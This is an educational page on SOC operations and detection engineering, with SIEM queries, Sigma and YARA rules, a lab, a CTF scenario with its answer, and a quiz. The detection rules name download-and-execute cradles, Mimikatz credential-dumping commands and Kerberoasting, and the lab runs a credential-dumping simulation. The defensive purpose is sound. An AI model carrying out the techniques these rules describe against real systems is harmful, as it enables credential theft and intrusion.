Blue Team & SOC Operations
The Security Operations Center (SOC) is the nerve center of an organization's defensive security capability. SOC analysts monitor, detect, investigate, and respond to security incidents around the clock. Blue team engineering goes further — building the detections, tuning the alerts, and designing the infrastructure that makes the SOC effective.
This page covers the operational structure of a SOC, the tools used for detection and investigation, how to build effective detection rules, and the metrics that measure SOC performance. If you want to understand what happens after an alert fires, this is where you start.
Related: Cybersecurity Overview | Red Team Operations | Active Directory | Malware Analysis
SOC Organizational Structure
SOC Tiers
Modern SOCs use a tiered model where analysts at different levels handle incidents of increasing complexity.
Roles and Responsibilities
| Tier | Title | Responsibilities | Skills Required | Avg Salary (US) |
|---|---|---|---|---|
| L1 | SOC Analyst | Monitor dashboards, triage alerts, execute playbooks, escalate | SIEM basics, networking, OS fundamentals | $55K-$75K |
| L2 | Incident Responder | Investigate escalated incidents, perform containment, correlate events | Log analysis, malware triage, forensics | $75K-$110K |
| L3 | Threat Hunter / Detection Engineer | Proactive hunting, build detection rules, tune SIEM, tool development | Advanced forensics, scripting, ATT&CK expertise | $110K-$160K |
| — | SOC Manager | Team leadership, metrics reporting, process improvement, vendor management | Leadership, communication, security strategy | $130K-$180K |
SIEM Platforms
Security Information and Event Management (SIEM) platforms aggregate logs from every source in the environment, correlate events, and trigger alerts.
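The "correlate events and trigger alerts" step can be illustrated outside any particular SIEM. The following is a minimal sketch, assuming hypothetical normalized events with `time`, `event_code`, `src_ip`, and `user` fields (these names are illustrative, not a vendor schema). It counts failed logons (Event ID 4625) per source and user inside a time window and reports pairs above a threshold.

```python
from collections import Counter
from datetime import datetime, timedelta

# Hypothetical normalized events; field names are illustrative only.
EVENTS = [
    {"time": datetime(2026, 3, 20, 2, 0, s), "event_code": 4625,
     "src_ip": "10.0.0.5", "user": "alice"}
    for s in range(12)
] + [
    {"time": datetime(2026, 3, 20, 2, 1, 0), "event_code": 4625,
     "src_ip": "10.0.0.9", "user": "bob"},
    {"time": datetime(2026, 3, 20, 2, 1, 5), "event_code": 4624,
     "src_ip": "10.0.0.5", "user": "alice"},
]


def failed_login_alerts(events, now, window=timedelta(hours=24), threshold=10):
    """Return (src_ip, user, count) for pairs with more than `threshold` failed logons."""
    cutoff = now - window
    counts = Counter(
        (e["src_ip"], e["user"])
        for e in events
        if e["event_code"] == 4625 and e["time"] >= cutoff
    )
    # most_common() yields the noisiest pairs first, like "sort -count" in SPL.
    return [(ip, user, n) for (ip, user), n in counts.most_common() if n > threshold]


alerts = failed_login_alerts(EVENTS, now=datetime(2026, 3, 20, 3, 0, 0))
print(alerts)  # [('10.0.0.5', 'alice', 12)]
```

A real SIEM does the same grouping at scale and on a schedule; the threshold and window are tuning parameters, not fixed values.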
SIEM Comparison
| Feature | Splunk Enterprise | Elastic SIEM | Microsoft Sentinel | QRadar |
|---|---|---|---|---|
| Deployment | On-prem / Cloud | On-prem / Cloud | Cloud-only (Azure) | On-prem / Cloud |
| Query Language | SPL | KQL / Lucene | KQL | AQL |
| Pricing Model | Data volume (GB/day) | Nodes / self-managed | Data ingestion (GB/day) | EPS (events/sec) |
| Strengths | Mature ecosystem, SPL power | Open source core, cost-effective | Azure integration, AI/ML | IBM ecosystem, compliance |
| Weaknesses | Expensive at scale | Complex cluster management | Azure lock-in | Declining market share |
| Best For | Large enterprise, complex analysis | Cost-conscious, technical teams | Microsoft-heavy environments | Regulated industries |
Splunk SPL Essentials
# Basic search: failed logins in the last 24 hours
index=windows sourcetype=WinEventLog EventCode=4625 earliest=-24h
| stats count by src_ip, user
| where count > 10
| sort -count
# Detect Kerberoasting: TGS requests with RC4 encryption
# Machine accounts (service names ending in $) are excluded
index=windows sourcetype=WinEventLog EventCode=4769 Ticket_Encryption_Type=0x17
| where NOT like(Service_Name, "%$")
| stats count by Service_Name, Client_Address
| where count > 5
# Detect lateral movement: PsExec-style service creation
index=windows sourcetype=WinEventLog EventCode=7045
| where Service_Name != "Windows Update" AND Service_Name != "BITS"
| table _time, ComputerName, Service_Name, Service_File_Name
# PowerShell suspicious commands
index=windows sourcetype=WinEventLog EventCode=4104
| search ScriptBlockText="*Invoke-Mimikatz*" OR ScriptBlockText="*Invoke-Kerberoast*"
| table _time, ComputerName, ScriptBlockText
# Network connection anomalies
index=firewall action=allowed dest_port=443
| stats count dc(dest_ip) as unique_destinations by src_ip
| where unique_destinations > 100
Elastic SIEM / KQL
# KQL: detect suspicious PowerShell execution
event.code: "4104" and powershell.file.script_block_text: (*downloadstring* or *invoke-expression* or *iex* or *bypass*)
# KQL: failed authentication events
# Kibana KQL only filters and has no stats pipeline, so apply the grouping
# (by source.ip and user.name, count > 10) in a threshold rule or an aggregation
event.code: "4625"
# KQL: process execution from unusual paths
process.executable: (*\\Temp\\* or *\\AppData\\* or *\\Downloads\\*) and not process.name: (chrome.exe or firefox.exe or msedge.exe)
Microsoft Sentinel (KQL)
// Detect brute force attacks
SecurityEvent
| where EventID == 4625
| summarize FailedAttempts = count() by TargetAccount, IpAddress, bin(TimeGenerated, 1h)
| where FailedAttempts > 20
| project TimeGenerated, TargetAccount, IpAddress, FailedAttempts
// Detect anomalous sign-ins (Azure AD)
SigninLogs
| where ResultType != "0"
| summarize FailureCount = count() by UserPrincipalName, IPAddress, Location
| where FailureCount > 10
// Detect DCSync indicators
SecurityEvent
| where EventID == 4662
| where Properties has "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
| where SubjectUserName !endswith "$"
| project TimeGenerated, SubjectUserName, ObjectName
Detection Engineering
Detection engineering is the practice of building, testing, and maintaining detection rules that identify malicious activity with high precision and low false positive rates.
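One way to make "high precision and low false positive rates" measurable is to replay a rule over labeled sample events before deploying it. The sketch below assumes a rule is any Python callable that returns True when it fires; the `encoded_powershell` rule and the sample events are hypothetical and exist only to exercise the harness.

```python
def evaluate_rule(rule, labeled_events):
    """Return TP/FP/FN counts plus precision and recall for (event, is_malicious) pairs."""
    tp = fp = fn = 0
    for event, is_malicious in labeled_events:
        fired = rule(event)
        if fired and is_malicious:
            tp += 1
        elif fired and not is_malicious:
            fp += 1
        elif not fired and is_malicious:
            fn += 1
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    return {"tp": tp, "fp": fp, "fn": fn, "precision": precision, "recall": recall}


def encoded_powershell(event):
    """Hypothetical rule: PowerShell launched with an encoded command."""
    cmd = event.get("command_line", "").lower()
    return "powershell" in cmd and "-enc" in cmd


SAMPLES = [
    ({"command_line": "powershell.exe -enc SQBFAFgA"}, True),
    ({"command_line": "powershell.exe -EncodedCommand ZABpAHIA"}, False),  # benign admin script
    ({"command_line": "powershell.exe -nop -w hidden IEX(New-Object Net.WebClient)"}, True),  # missed
    ({"command_line": "notepad.exe report.txt"}, False),
]

result = evaluate_rule(encoded_powershell, SAMPLES)
print(result)
```

Here the rule fires once correctly, once on a benign script, and misses one malicious sample, so both precision and recall come out at 0.5. Keeping such samples alongside each rule turns tuning into a regression test rather than guesswork.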
Detection Lifecycle
Sigma Rules
Sigma is a vendor-agnostic format for detection rules. Write once, convert to any SIEM platform.
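Before reading a full rule, it helps to see what Sigma's matching semantics amount to. In Sigma, string matching is case-insensitive by default, the `|contains` modifier is a substring match, a list of values is OR'ed, and the `condition` combines named selections. The following is a simplified sketch of that logic in plain Python, not the pySigma implementation; the selection lists are a shortened, illustrative subset.

```python
def contains_any(value, needles):
    """Sigma `|contains` with a list: case-insensitive substring match, values OR'ed."""
    lowered = value.lower()
    return any(n.lower() in lowered for n in needles)


# Illustrative subsets of what a download-cradle rule might list.
SELECTION_DOWNLOAD = ["DownloadString", "DownloadFile", "Invoke-WebRequest"]
SELECTION_EXEC = ["Invoke-Expression", "IEX(", "IEX ("]


def matches(event):
    """Equivalent of `condition: selection_download and selection_exec`."""
    text = event.get("ScriptBlockText", "")
    return contains_any(text, SELECTION_DOWNLOAD) and contains_any(text, SELECTION_EXEC)


cradle = {"ScriptBlockText": "iex (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"}
download_only = {"ScriptBlockText": "Invoke-WebRequest https://example.test/file.zip -OutFile f.zip"}

print(matches(cradle))         # True
print(matches(download_only))  # False
```

Requiring both selections is what keeps the rule from firing on every script that merely downloads a file.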
# Sigma rule: detect suspicious PowerShell execution
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b5b6-1e5d7fd6f5f3
status: stable
description: Detects PowerShell commands commonly used to download and execute payloads
author: SOC Team
date: 2026-03-20
references:
    - https://attack.mitre.org/techniques/T1059/001/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Script Block Logging must be enabled'
detection:
    selection_download:
        ScriptBlockText|contains:
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - 'wget '
            - 'curl '
            - 'Start-BitsTransfer'
    selection_exec:
        ScriptBlockText|contains:
            - 'Invoke-Expression'
            - 'IEX('
            - 'IEX ('
            - 'iex('
    condition: selection_download and selection_exec
falsepositives:
    - Legitimate admin scripts that download and execute
    - Software deployment tools
level: high
# Convert Sigma rules to SIEM-specific formats
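# Install sigma-cli, the pySigma-based converter that replaced the legacy sigmac tool
pip install sigma-cli
# Backends ship as plugins; install the ones you need, then check the exact
# target and pipeline names with "sigma list targets" and "sigma list pipelines"
sigma plugin install splunk
# Convert to Splunk SPL
sigma convert -t splunk -p splunk_windows suspicious_powershell.yml
# Convert to an Elasticsearch query (Lucene syntax, requires the elasticsearch plugin)
sigma convert -t lucene -p ecs_windows suspicious_powershell.yml
# Convert to Microsoft 365 Defender advanced hunting KQL
# (Sentinel tables may need a different backend or pipeline)
sigma convert -t microsoft365defender suspicious_powershell.yml
# Bulk convert an entire ruleset into one output file
sigma convert -t splunk -p splunk_windows rules/ -o splunk_rules.txt
YARA Rules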
YARA identifies and classifies malware based on textual or binary patterns. Used for file scanning, memory scanning, and threat hunting.
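To make the moving parts of a YARA condition concrete, the sketch below re-implements two common building blocks in plain Python: the `uint16(0) == 0x5A4D` PE check and an approximation of `ascii wide nocase` string matching. It is an illustration of the semantics, not a replacement for the YARA engine, and the keyword list and sample buffers are made up for the example. Note that in YARA `and` binds tighter than `or`, so a header check only guards the string matches it is explicitly grouped with.

```python
import struct


def is_pe(data: bytes) -> bool:
    """Equivalent of YARA's `uint16(0) == 0x5A4D`: the file starts with 'MZ'."""
    return len(data) >= 2 and struct.unpack_from("<H", data, 0)[0] == 0x5A4D


def has_string(data: bytes, text: str, nocase: bool = False) -> bool:
    """Approximate `ascii wide`: search for the ASCII and UTF-16LE encodings."""
    haystack = data.lower() if nocase else data
    needle = text.lower() if nocase else text
    return needle.encode("ascii") in haystack or needle.encode("utf-16-le") in haystack


def looks_like_mimikatz(data: bytes) -> bool:
    """PE header AND (any keyword): the grouping keeps the header check in force."""
    keywords = ["sekurlsa::logonpasswords", "lsadump::dcsync", "gentilkiwi"]
    return is_pe(data) and any(has_string(data, k, nocase=True) for k in keywords)


# Synthetic buffers for illustration only.
pe_sample = b"MZ\x90\x00" + "sekurlsa::logonpasswords".encode("utf-16-le")
text_sample = b"notes about sekurlsa::logonpasswords"

print(looks_like_mimikatz(pe_sample))    # True
print(looks_like_mimikatz(text_sample))  # False: keyword present, but not a PE file
```

The second sample shows why the header check matters: documentation, blog posts, and detection rules themselves contain these strings without being the tool.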
rule Mimikatz_Detection {
    meta:
        description = "Detects Mimikatz credential dumping tool"
        author = "SOC Team"
        severity = "critical"
        reference = "https://attack.mitre.org/software/S0002/"
    strings:
        $s1 = "sekurlsa::logonpasswords" ascii wide
        $s2 = "sekurlsa::wdigest" ascii wide
        $s3 = "lsadump::dcsync" ascii wide
        $s4 = "kerberos::golden" ascii wide
        $s5 = "mimikatz" ascii wide nocase
        $s6 = "gentilkiwi" ascii wide
        // Raw ASCII bytes of "Mimikatz" and "mimikatz"; these duplicate $s5
        // and will not match packed or obfuscated builds
        $b1 = { 4D 69 6D 69 6B 61 74 7A }
        $b2 = { 6D 69 6D 69 6B 61 74 7A }
    condition:
        // "and" binds tighter than "or", so the string checks are grouped
        // to keep the PE header check applied to both
        uint16(0) == 0x5A4D and // PE file
        (any of ($s*) or 2 of ($b*))
}
rule Cobalt_Strike_Beacon {
    meta:
        description = "Detects Cobalt Strike beacon payloads"
        author = "SOC Team"
        severity = "critical"
    strings:
        $config = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? }
        $sleep_mask = "SleepMask" ascii
        $pipe = "\\\\.\\pipe\\msagent_" ascii
    condition:
        uint16(0) == 0x5A4D and
        ($config or $sleep_mask or $pipe)
}
Threat Intelligence
Threat Intelligence Lifecycle
Intelligence Types
| Type | Description | Example | Consumer |
|---|---|---|---|
| Strategic | High-level trends, motivations, geopolitics | "APT28 is targeting NATO defense contractors" | Leadership, CISO |
| Tactical | TTPs used by adversaries, mapped to ATT&CK | "Threat actors use DLL sideloading via OneDrive" | Detection engineers |
| Operational | Specific campaigns, timelines, infrastructure | "Campaign X uses domain evil.com, IP 1.2.3.4" | Incident responders |
| Technical | IOCs: hashes, IPs, domains, URLs | malware.exe SHA256: abc123... | SIEM, EDR, firewalls |
Threat Intel Platforms & Feeds
| Platform | Type | Cost | Strengths |
|---|---|---|---|
| MISP | Open source TIP | Free | Community sharing, STIX/TAXII |
| OpenCTI | Open source TIP | Free | Knowledge graph, ATT&CK mapping |
| AlienVault OTX | Community feed | Free | Large community, pulse system |
| VirusTotal | File/URL analysis | Free tier + Enterprise | Multi-AV scanning, behavior |
| Recorded Future | Commercial TIP | $$$$ | AI-powered, comprehensive |
| CrowdStrike Falcon Intel | Commercial feed | $$$ | Actor profiles, real-time alerts |
| Abuse.ch | Community feeds | Free | URLhaus, MalwareBazaar, ThreatFox |
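Technical intelligence from feeds like these is typically consumed by matching indicators against events. The following is a minimal sketch, assuming a hypothetical in-memory indicator set (as it might be exported from a TIP) and hypothetical event field names (`dns_query`, `dest_ip`, `sha256`). Domains match exactly or as a parent of a subdomain; IPs and hashes match exactly.

```python
import ipaddress

# Hypothetical indicator set; values use documentation-reserved ranges and names.
IOCS = {
    "domain": {"evil.example"},
    "ip": {"203.0.113.7"},
    "sha256": {"a" * 64},
}


def match_iocs(event, iocs=IOCS):
    """Return a list of (indicator_type, indicator) hits for one event."""
    hits = []
    domain = event.get("dns_query", "").lower().rstrip(".")
    for bad in sorted(iocs["domain"]):
        # Match the domain itself or any subdomain, but not look-alike suffixes.
        if domain == bad or domain.endswith("." + bad):
            hits.append(("domain", bad))
    ip = event.get("dest_ip")
    if ip and str(ipaddress.ip_address(ip)) in iocs["ip"]:
        hits.append(("ip", ip))
    digest = event.get("sha256", "").lower()
    if digest in iocs["sha256"]:
        hits.append(("sha256", digest))
    return hits


print(match_iocs({"dns_query": "cdn.Evil.example.", "dest_ip": "203.0.113.7"}))
# [('domain', 'evil.example'), ('ip', '203.0.113.7')]
print(match_iocs({"dns_query": "notevil.example"}))
# []
```

Normalizing case and the trailing dot before comparison avoids the most common source of missed matches; indicator aging and confidence scoring are deliberately left out of this sketch.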
Alert Triage Workflow
A structured triage workflow prevents alert fatigue and ensures consistent investigation quality.
Triage Checklist
## Alert Triage Template
### 1. Initial Assessment (< 5 minutes)
- [ ] Read alert title and description
- [ ] Check if source IP/user is known (VIP, service account, scanner)
- [ ] Check alert history — has this fired before? How was it resolved?
- [ ] Check threat intel — are IOCs in any feeds?
### 2. Context Gathering (< 15 minutes)
- [ ] Pivot on source IP: What other activity from this IP in the last 24h?
- [ ] Pivot on user: Is this normal behavior for this user/role?
- [ ] Pivot on destination: Is this a legitimate service/server?
- [ ] Check EDR: Any endpoint alerts on the same host?
- [ ] Check network: Any unusual traffic patterns?
### 3. Decision
- [ ] False Positive → Document, tune rule, close
- [ ] True Positive, benign → Document, close (consider policy)
- [ ] True Positive, malicious → Escalate, begin IR
Reducing Alert Fatigue
SOCs commonly report receiving thousands of alerts per day (figures of 10,000+ are often cited), and most of them turn out to be false positives. To combat fatigue:
- Tune rules aggressively — Every FP that repeats should be filtered
- Use risk scoring — Aggregate low-fidelity signals into high-confidence alerts
- Automate triage — SOAR playbooks handle repetitive investigation steps
- Enrich automatically — Auto-lookup IPs, hashes, domains against threat intel
- Track FP rates per rule — Rules above 90% FP rate need rewriting or removal
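The risk scoring idea in the list above can be sketched in a few lines. This example assumes hypothetical rule names and weights (real values would come from tuning) and a signal format of `{"entity", "rule"}`. Each low-fidelity signal adds risk to the host or user it concerns, each rule counts once per entity, and only entities that cross a threshold become alerts.

```python
from collections import defaultdict

# Hypothetical per-rule risk weights; real values would come from tuning.
RISK_WEIGHTS = {
    "failed_logon_burst": 20,
    "rc4_tgs_request": 30,
    "new_service_installed": 40,
}


def risk_alerts(signals, threshold=70):
    """Sum risk per entity, counting each rule once, and keep entities at or above threshold."""
    rules_by_entity = defaultdict(set)
    for signal in signals:
        rules_by_entity[signal["entity"]].add(signal["rule"])
    scores = {
        entity: sum(RISK_WEIGHTS.get(rule, 0) for rule in rules)
        for entity, rules in rules_by_entity.items()
    }
    return {entity: score for entity, score in scores.items() if score >= threshold}


SIGNALS = [
    {"entity": "WS-042", "rule": "rc4_tgs_request"},
    {"entity": "WS-042", "rule": "new_service_installed"},
    {"entity": "WS-042", "rule": "rc4_tgs_request"},  # duplicate, counted once
    {"entity": "WS-007", "rule": "failed_logon_burst"},
]

print(risk_alerts(SIGNALS))  # {'WS-042': 70}
```

Counting each rule once per entity is a design choice: it rewards a variety of suspicious behaviors over one noisy rule firing repeatedly.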
SOC KPIs and Metrics
Key Performance Indicators
| Metric | Definition | Target | How to Improve |
|---|---|---|---|
| MTTD (Mean Time to Detect) | Time from attack to first alert | < 24 hours | Better detection rules, more log sources |
| MTTR (Mean Time to Respond) | Time from alert to containment | < 4 hours | SOAR automation, clear playbooks |
| MTTA (Mean Time to Acknowledge) | Time from alert to analyst assignment | < 15 minutes | Proper staffing, alert routing |
| False Positive Rate | % of alerts that are benign | < 40% | Tune rules, add context, risk scoring |
| Detection Coverage | % of ATT&CK techniques with detections | > 70% | Gap analysis, new data sources |
| Alert Volume | Alerts per analyst per shift | < 50 actionable | Tune, deduplicate, automate |
| Dwell Time | Time attacker is undetected in network | < 7 days | Threat hunting, better visibility |
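The time-based metrics in the table are simple averages over incident timestamps. The sketch below assumes a hypothetical incident record with `attack_start`, `alerted`, `acknowledged`, and `contained` timestamps, plus a list of alert dispositions for the false positive rate. The data is invented for illustration.

```python
from datetime import datetime
from statistics import mean

# Hypothetical incident records; timestamps are invented for illustration.
INCIDENTS = [
    {"attack_start": datetime(2026, 3, 1, 0, 0), "alerted": datetime(2026, 3, 1, 6, 0),
     "acknowledged": datetime(2026, 3, 1, 6, 10), "contained": datetime(2026, 3, 1, 8, 0)},
    {"attack_start": datetime(2026, 3, 2, 0, 0), "alerted": datetime(2026, 3, 2, 2, 0),
     "acknowledged": datetime(2026, 3, 2, 2, 20), "contained": datetime(2026, 3, 2, 6, 0)},
]


def mean_hours(incidents, start_key, end_key):
    """Average elapsed time between two timestamps, in hours."""
    return mean((i[end_key] - i[start_key]).total_seconds() / 3600 for i in incidents)


mttd = mean_hours(INCIDENTS, "attack_start", "alerted")  # attack to first alert
mtta = mean_hours(INCIDENTS, "alerted", "acknowledged")  # alert to analyst assignment
mttr = mean_hours(INCIDENTS, "alerted", "contained")     # alert to containment

# Hypothetical dispositions recorded when alerts were closed.
DISPOSITIONS = ["fp", "fp", "tp", "benign_tp", "fp"]
fp_rate = DISPOSITIONS.count("fp") / len(DISPOSITIONS)

print(f"MTTD {mttd:.1f} h, MTTA {mtta * 60:.0f} min, MTTR {mttr:.1f} h, FP rate {fp_rate:.0%}")
```

In practice the hard part is the input: `attack_start` is usually only known after an investigation, which is why MTTD and dwell time are reported retrospectively.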
Log Sources and Visibility
A SOC is only as good as its data sources. Missing logs means missing attacks.
| Log Source | What It Shows | Critical Events |
|---|---|---|
| Windows Security Log | Authentication, process creation, object access | 4624, 4625, 4688, 4662, 4769 |
| Sysmon | Enhanced process, network, file monitoring | Event 1 (process), 3 (network), 11 (file create) |
| EDR Telemetry | Endpoint behavior, process trees, file writes | Varies by vendor |
| Firewall Logs | Network connections allowed/denied | Outbound to suspicious IPs/ports |
| DNS Logs | Domain resolution queries | Queries to known-bad domains, DGA patterns |
| Proxy/Web Gateway | HTTP/S traffic, URLs visited | Downloads of executables, C2 traffic |
| Email Gateway | Inbound/outbound email, attachments | Phishing attempts, malicious attachments |
| Cloud Audit Logs | API calls, IAM changes, resource creation | Privilege escalation, data access |
| Authentication Logs | SSO, MFA, VPN logins | Impossible travel, credential stuffing |
Critical: Enable These Logs
Many organizations lack visibility because key logs are not enabled:
- PowerShell Script Block Logging (Event 4104) — Reveals obfuscated PowerShell
- Sysmon — Provides process, network, and file visibility far beyond default Windows logging
- Windows command-line audit (Event 4688 with process command line) — Shows what processes are doing
- DNS query logging — Essential for detecting C2, tunneling, and DGA domains
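Enabling a log source is only half the job; it also has to keep reporting. A simple health check is to compare the last event time per source against a maximum allowed silence. The sketch below assumes hypothetical source names and a `last_seen` mapping that would, in practice, come from a SIEM query.

```python
from datetime import datetime, timedelta

# Hypothetical names for the sources this SOC treats as mandatory.
REQUIRED_SOURCES = {"windows_security", "sysmon", "powershell_4104", "dns"}


def silent_sources(last_seen, now, max_age=timedelta(hours=1)):
    """Return required sources that never reported or have been quiet longer than max_age."""
    return sorted(
        src for src in REQUIRED_SOURCES
        if src not in last_seen or now - last_seen[src] > max_age
    )


now = datetime(2026, 3, 20, 12, 0)
last_seen = {
    "windows_security": datetime(2026, 3, 20, 11, 55),
    "sysmon": datetime(2026, 3, 20, 9, 0),   # quiet for three hours
    "dns": datetime(2026, 3, 20, 11, 30),
    # powershell_4104 has never reported
}

print(silent_sources(last_seen, now))  # ['powershell_4104', 'sysmon']
```

A sensible `max_age` differs per source: a domain controller that is silent for an hour is suspicious, while a rarely used application log may be quiet for days.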
SOAR (Security Orchestration, Automation, and Response)
SOAR platforms automate repetitive SOC tasks through playbooks.
| Platform | Type | Strengths |
|---|---|---|
| Splunk SOAR (Phantom) | Commercial | Deep Splunk integration |
| Microsoft Sentinel + Logic Apps | Cloud | Azure ecosystem |
| Cortex XSOAR (Palo Alto) | Commercial | Large integration library |
| Shuffle | Open source | Free, community-driven |
| TheHive | Open source | Case management + Cortex analyzers |
Example SOAR Playbook: Phishing Triage
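A minimal sketch of what a phishing triage playbook might do, written as plain Python rather than in any SOAR product's format. The `lookup_reputation` helper is a hypothetical stand-in for a threat intel or sandbox lookup, and the action names are illustrative labels, not real platform actions.

```python
import re

URL_RE = re.compile(r"https?://[^\s<>]+")


def lookup_reputation(url):
    """Hypothetical stand-in for a threat intel lookup; a real playbook would call a TIP or sandbox."""
    return "malicious" if "evil.example" in url else "unknown"


def phishing_playbook(email):
    """Extract URLs, enrich them, and decide on follow-up actions for a reported email."""
    urls = URL_RE.findall(email["body"])
    verdicts = {url: lookup_reputation(url) for url in urls}
    if any(v == "malicious" for v in verdicts.values()):
        actions = ["quarantine_email", "block_urls", "escalate_to_l2"]
    elif urls or email.get("attachments"):
        # Nothing known-bad, but there is content an analyst should look at.
        actions = ["queue_for_analyst_review"]
    else:
        actions = ["close_no_indicators"]
    return {"urls": urls, "verdicts": verdicts, "actions": actions}


reported = {"body": "Reset your password at http://login.evil.example/reset today"}
outcome = phishing_playbook(reported)
print(outcome["actions"])  # ['quarantine_email', 'block_urls', 'escalate_to_l2']
```

The automation handles extraction, enrichment, and the clear-cut cases; anything ambiguous is routed to a person rather than closed automatically.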
Further Reading
- Red Team Operations — Understanding the adversary perspective
- Active Directory Attacks & Defense — AD-specific detections
- Malware Analysis — Deep dive into malware investigation
- Security Certifications — CySA+, GCIH, BTL1 for blue team
- Incident Response & Forensics — IR process and forensic techniques
Key Takeaway
- A SOC is only as good as its data sources — missing logs means missing attacks; enable Sysmon, PowerShell Script Block Logging, and DNS query logging before anything else
- Sigma rules provide vendor-agnostic detection: write once, convert to Splunk SPL, Elastic KQL, or Sentinel KQL with a single command
- The biggest enemy of a SOC is alert fatigue — tune aggressively, automate triage with SOAR, and track false positive rates per rule
Hands-On Lab
Lab: Build a Detection Engineering Pipeline
- Set up a free Elastic SIEM instance (or Wazuh) on a lab VM
- Configure Windows Event forwarding from a test workstation with Sysmon installed
- Write a Sigma rule to detect Mimikatz execution (look for process name or command-line patterns)
- Convert the Sigma rule to your SIEM's query language using sigma convert
- Deploy the detection rule in your SIEM
- Execute a Mimikatz simulation using Atomic Red Team (Invoke-AtomicTest T1003.001)
- Verify the alert fires, then tune it to reduce false positives from legitimate LSASS access
- Create a SOAR playbook that automatically enriches alerts with VirusTotal lookups
CTF Challenge
Challenge: The Phantom Lateral Movement
Your SIEM shows a successful logon (Event ID 4624, Logon Type 3) from workstation WS-042 to server SRV-DB-01 at 2:17 AM using the svc_sql account. No legitimate admin activity was scheduled. Investigate the alert and determine: Is this a true positive? What attack technique was used? What should be contained?
Hints:
- Check Event ID 4769 on the DC around 2:15 AM for TGS requests
- Look for Event ID 7045 on SRV-DB-01 for new service creation
- Check if svc_sql is a Kerberoastable service account
Answer
Event ID 4769 at 2:15 AM shows a TGS request for svc_sql with RC4 encryption (type 0x17) from WS-042 — Kerberoasting. The attacker cracked the service ticket offline and used the password for lateral movement. Event ID 7045 on SRV-DB-01 shows a new service BTOBTO created by svc_sql — PsExec-style execution. Contain: isolate WS-042 and SRV-DB-01, reset svc_sql password, convert to gMSA. Flag: CTF{kerberoast_lateral_move_detected}.
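The reasoning in the answer can be expressed as a correlation over the three event types. The sketch below uses hypothetical event dictionaries; the date, the domain controller name `DC-01`, and the 2:18 AM timestamp of the service creation are assumptions added for illustration, since the challenge does not state them. It links an RC4 TGS request to a later network logon with the same account from the same workstation, then to new services on the target host.

```python
from datetime import datetime, timedelta

# Hypothetical events; the date, DC-01, and the 7045 timestamp are assumptions.
EVENTS = [
    {"time": datetime(2026, 3, 20, 2, 15), "id": 4769, "host": "DC-01",
     "client": "WS-042", "service": "svc_sql", "enc_type": "0x17"},
    {"time": datetime(2026, 3, 20, 2, 17), "id": 4624, "host": "SRV-DB-01",
     "source": "WS-042", "account": "svc_sql", "logon_type": 3},
    {"time": datetime(2026, 3, 20, 2, 18), "id": 7045, "host": "SRV-DB-01",
     "account": "svc_sql", "service_name": "BTOBTO"},
]


def find_kerberoast_chains(events, window=timedelta(minutes=30)):
    """Link RC4 TGS requests to later type 3 logons and service installs on the target."""
    ordered = sorted(events, key=lambda e: e["time"])
    chains = []
    for tgs in ordered:
        if tgs["id"] != 4769 or tgs["enc_type"] != "0x17":
            continue
        for logon in ordered:
            if (logon["id"] == 4624 and logon["logon_type"] == 3
                    and logon["account"] == tgs["service"]
                    and logon["source"] == tgs["client"]
                    and timedelta(0) <= logon["time"] - tgs["time"] <= window):
                new_services = [
                    e["service_name"] for e in ordered
                    if e["id"] == 7045 and e["host"] == logon["host"]
                    and timedelta(0) <= e["time"] - logon["time"] <= window
                ]
                chains.append({"account": tgs["service"], "from": tgs["client"],
                               "to": logon["host"], "new_services": new_services})
    return chains


chains = find_kerberoast_chains(EVENTS)
print(chains)
```

For the sample data this yields one chain: svc_sql, from WS-042 to SRV-DB-01, with the new service BTOBTO. The 30-minute window is an arbitrary choice for the sketch; offline cracking can take far longer, so a production correlation would use a wider window.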
Common Misconceptions
- "More alerts mean better security" — Alert volume without context creates fatigue. Quality (high true positive rate) matters more than quantity.
- "SIEM deployment means threats are detected" — A SIEM without tuned rules, sufficient log sources, and trained analysts is just an expensive log storage solution.
- "Threat hunting is just running queries" — True threat hunting starts with a hypothesis based on threat intelligence, systematically searches for evidence, and creates new detections from findings.
- "Sigma rules replace SIEM-specific rules" — Sigma provides portability, but converted rules often need platform-specific tuning for field names, log formats, and performance optimization.
- "L1 analysts just click buttons" — Effective L1 triage requires understanding networking, OS internals, and attacker TTPs. The role is the foundation of SOC effectiveness.
Quiz
1. What is the primary advantage of Sigma detection rules?
a) They are faster than native SIEM rules b) They are vendor-agnostic and can be converted to any SIEM platform c) They automatically block threats d) They replace YARA rules
Answer
b) Sigma rules are written in a universal YAML format and can be converted to Splunk SPL, Elastic KQL, Microsoft Sentinel KQL, and other SIEM query languages.
2. What SOC metric measures the time from an attack starting to the first alert firing?
a) MTTR (Mean Time to Respond) b) MTTD (Mean Time to Detect) c) MTTA (Mean Time to Acknowledge) d) SLA compliance rate
Answer
b) MTTD measures the elapsed time between when an attack begins and when the SOC's first alert fires. Lower MTTD means faster detection.
3. Which Windows Event ID reveals the full text of PowerShell scripts executed on a system?
a) 4624 b) 4688 c) 4104 d) 7045
Answer
c) Event ID 4104 (PowerShell Script Block Logging) captures the full text of every PowerShell script executed, including deobfuscated content. This is critical for detecting encoded or obfuscated PowerShell attacks.
4. What is the purpose of SOAR in a SOC?
a) Replacing analysts entirely b) Automating repetitive triage and response tasks through playbooks c) Storing log data more efficiently d) Training new analysts
Answer
b) SOAR (Security Orchestration, Automation, and Response) automates repetitive investigation steps like IOC enrichment, email quarantine, and IP blocking, freeing analysts for complex analysis.
5. What should a SOC do when a detection rule has a 95% false positive rate?
a) Ignore all alerts from that rule b) Disable the rule entirely c) Rewrite or tune the rule to improve precision, or remove it d) Increase the alert priority
Answer
c) A rule with 95% FP rate wastes analyst time and contributes to alert fatigue. It should be rewritten with more specific conditions, additional context filters, or removed if it cannot be improved.
One-Liner Summary: The blue team's job is not to prevent every attack — it is to detect, contain, and recover faster than the attacker can cause damage.